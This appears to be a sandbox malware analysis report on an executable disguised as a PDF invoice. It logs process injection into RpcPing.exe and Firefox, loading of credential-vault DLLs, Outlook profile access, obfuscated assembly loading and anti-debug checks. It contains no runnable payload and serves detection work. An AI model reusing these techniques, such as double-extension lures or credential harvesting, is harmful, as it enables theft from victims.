            Source: RpcPing.exe, 00000008.00000003.2435255903.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2432168414.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2431409420.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2432933782.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2431030399.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2432548929.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2929881128.00000000033E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Virustotal: Detection: 38%
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe ReversingLabs: Detection: 28%
            Source: unknown Process created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe"
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe"
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe"
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Process created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe"
            Source: C:\Windows\SysWOW64\RpcPing.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: dwrite.dll
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: windowscodecs.dll
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: credui.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Section loaded: wininet.dll
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: Hx.pdbSHA256 source: ORIGINAL INVOICE COAU7230734298.pdf.exe
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fFUkGixTNm.exe, 00000007.00000002.2930068881.0000000000B3E000.00000002.00000001.01000000.0000000C.sdmp, fFUkGixTNm.exe, 00000009.00000002.2929589735.0000000000B3E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2247703529.000000000382F000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2245830854.0000000003672000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: RPCPing.pdbGCTL source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2240436537.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930259689.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe, ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, RpcPing.exe, 00000008.00000003.2247703529.000000000382F000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2245830854.0000000003672000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: RPCPing.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2240436537.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930259689.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Hx.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe

            Data Obfuscation

            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, frmListContacts.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.3682450.2.raw.unpack, MainForm.cs .Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, GoUr3lTHbTH93s671o.cs .Net Code: MLL574kV9S System.Reflection.Assembly.Load(byte[])
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, GoUr3lTHbTH93s671o.cs .Net Code: MLL574kV9S System.Reflection.Assembly.Load(byte[])
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, GoUr3lTHbTH93s671o.cs .Net Code: MLL574kV9S System.Reflection.Assembly.Load(byte[])
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.6b70000.4.raw.unpack, MainForm.cs .Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.366a230.1.raw.unpack, MainForm.cs .Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
            Source: 8.2.RpcPing.exe.40bcd14.2.raw.unpack, frmListContacts.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 9.2.fFUkGixTNm.exe.343cd14.1.raw.unpack, frmListContacts.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 9.0.fFUkGixTNm.exe.343cd14.1.raw.unpack, frmListContacts.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 10.2.firefox.exe.31d5cd14.0.raw.unpack, frmListContacts.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: 0xAFFFFCB7 [Fri Jul 27 19:12:55 2063 UTC]
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 0_2_070E9DED push FFFFFF8Bh; iretd 0_2_070E9DEF
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_0040D0CA push edi; ret 3_2_0040D0CC
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00416166 pushfd ; iretd 3_2_004161E5
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00417984 push esp; iretd 3_2_0041798A
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00413B46 push eax; iretd 3_2_00413B71
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00413B62 push eax; iretd 3_2_00413B71
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00408307 push ds; iretd 3_2_00408309
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00403330 push eax; ret 3_2_00403332
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00415C40 push ebx; ret 3_2_00415C6A
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00415C43 push ebx; ret 3_2_00415C6A
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00404D23 push esi; retf 3_2_00404D24
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00413E4A push edi; retf 3_2_00413E4B
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00413F1C push eax; ret 3_2_00413F26
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00417FD0 push esp; ret 3_2_00417FD1
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_004187E8 push ebx; ret 3_2_004187E9
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_019E225F pushad ; ret 3_2_019E27F9
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_019E27FA pushad ; ret 3_2_019E27F9
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A109AD push ecx; mov dword ptr [esp], ecx 3_2_01A109B6
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_019E283D push eax; iretd 3_2_019E2858
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_019E1368 push eax; iretd 3_2_019E1369
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036FEB7E push ebx; ret 7_2_036FEBA5
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036FEB7B push ebx; ret 7_2_036FEBA5
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036F1242 push ds; iretd 7_2_036F1244
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036F6005 push edi; ret 7_2_036F6007
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036FF0A1 pushfd ; iretd 7_2_036FF120
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_037008BF push esp; iretd 7_2_037008C5
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_03701723 push ebx; ret 7_2_03701724
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_03700F0B push esp; ret 7_2_03700F0C
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_03701C14 push cs; retf 7_2_03701C15
            Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_039E225F pushad ; ret 8_2_039E27F9
            Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_039E27FA pushad ; ret 8_2_039E27F9
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: section name: .text entropy: 7.754463700440127
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack High entropy of concatenated method names
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack High entropy of concatenated method names
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack High entropy of concatenated method names

            Hooking and other Techniques for Hiding and Protection

            Source: Possible double extension: pdf.exe; Static PE information: ORIGINAL INVOICE COAU7230734298.pdf.exe
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\RpcPing.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match; File source: Process Memory Space: ORIGINAL INVOICE COAU7230734298.pdf.exe PID: 7276, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\RpcPing.exe; API/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\RpcPing.exe; API/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\RpcPing.exe; API/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\RpcPing.exe; API/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\RpcPing.exe; API/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\RpcPing.exe; API/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\RpcPing.exe; API/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\RpcPing.exe; API/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe; Memory allocated: C50000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe; Memory allocated: 2640000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe; Memory allocated: 7A70000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe; Memory allocated: 8A70000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe; Memory allocated: 8C40000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe; Memory allocated: 9C40000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe; Memory allocated: 9FD0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe; Memory allocated: AFD0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe; Memory allocated: BFD0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe; Code function: 3_2_01A5096E rdtsc 3_2_01A5096E
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\RpcPing.exe; Window / User API: threadDelayed 9836
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe; API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\RpcPing.exe; API coverage: 2.6 %
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe TID: 7296; Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\RpcPing.exe TID: 8020; Thread sleep count: 136 > 30
            Source: C:\Windows\SysWOW64\RpcPing.exe TID: 8020; Thread sleep time: -272000s >= -30000s
            Source: C:\Windows\SysWOW64\RpcPing.exe TID: 8020; Thread sleep count: 9836 > 30
            Source: C:\Windows\SysWOW64\RpcPing.exe TID: 8020; Thread sleep time: -19672000s >= -30000s
            Source: C:\Windows\SysWOW64\RpcPing.exe; Last function: Thread delayed
            Source: C:\Windows\SysWOW64\RpcPing.exe; Code function: 8_2_0327C000 FindFirstFileW,FindNextFileW,FindClose, 8_2_0327C000
            Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003372000.00000004.00000020.00020000.00000000.sdmp, fFUkGixTNm.exe, 00000009.00000002.2930419434.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2544629765.000001DEF1D4C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe; Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe; Process queried: DebugPort
            Source: C:\Windows\SysWOW64\RpcPing.exe; Process queried: DebugPort
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe; Code function: 3_2_004172F3 LdrLoadDll, 3_2_004172F3
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe; Code function: 3_2_01A50185 mov eax, dword ptr fs:[00000030h] 3_2_01A50185
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A92349 mov eax, dword ptr fs:[00000030h]3_2_01A92349
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A92349 mov eax, dword ptr fs:[00000030h]3_2_01A92349
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A92349 mov eax, dword ptr fs:[00000030h]3_2_01A92349
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE634F mov eax, dword ptr fs:[00000030h]3_2_01AE634F
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A9035C mov eax, dword ptr fs:[00000030h]3_2_01A9035C
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A9035C mov eax, dword ptr fs:[00000030h]3_2_01A9035C
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A9035C mov eax, dword ptr fs:[00000030h]3_2_01A9035C
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A9035C mov ecx, dword ptr fs:[00000030h]3_2_01A9035C
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A9035C mov eax, dword ptr fs:[00000030h]3_2_01A9035C
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A9035C mov eax, dword ptr fs:[00000030h]3_2_01A9035C
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AB8350 mov ecx, dword ptr fs:[00000030h]3_2_01AB8350
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ADA352 mov eax, dword ptr fs:[00000030h]3_2_01ADA352
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A202A0 mov eax, dword ptr fs:[00000030h]3_2_01A202A0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A202A0 mov eax, dword ptr fs:[00000030h]3_2_01A202A0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AA62A0 mov eax, dword ptr fs:[00000030h]3_2_01AA62A0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AA62A0 mov ecx, dword ptr fs:[00000030h]3_2_01AA62A0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AA62A0 mov eax, dword ptr fs:[00000030h]3_2_01AA62A0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AA62A0 mov eax, dword ptr fs:[00000030h]3_2_01AA62A0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AA62A0 mov eax, dword ptr fs:[00000030h]3_2_01AA62A0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AA62A0 mov eax, dword ptr fs:[00000030h]3_2_01AA62A0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4E284 mov eax, dword ptr fs:[00000030h]3_2_01A4E284
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4E284 mov eax, dword ptr fs:[00000030h]3_2_01A4E284
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A90283 mov eax, dword ptr fs:[00000030h]3_2_01A90283
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A90283 mov eax, dword ptr fs:[00000030h]3_2_01A90283
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A90283 mov eax, dword ptr fs:[00000030h]3_2_01A90283
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A202E1 mov eax, dword ptr fs:[00000030h]3_2_01A202E1
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A202E1 mov eax, dword ptr fs:[00000030h]3_2_01A202E1
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A202E1 mov eax, dword ptr fs:[00000030h]3_2_01A202E1
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1A2C3 mov eax, dword ptr fs:[00000030h]3_2_01A1A2C3
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1A2C3 mov eax, dword ptr fs:[00000030h]3_2_01A1A2C3
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1A2C3 mov eax, dword ptr fs:[00000030h]3_2_01A1A2C3
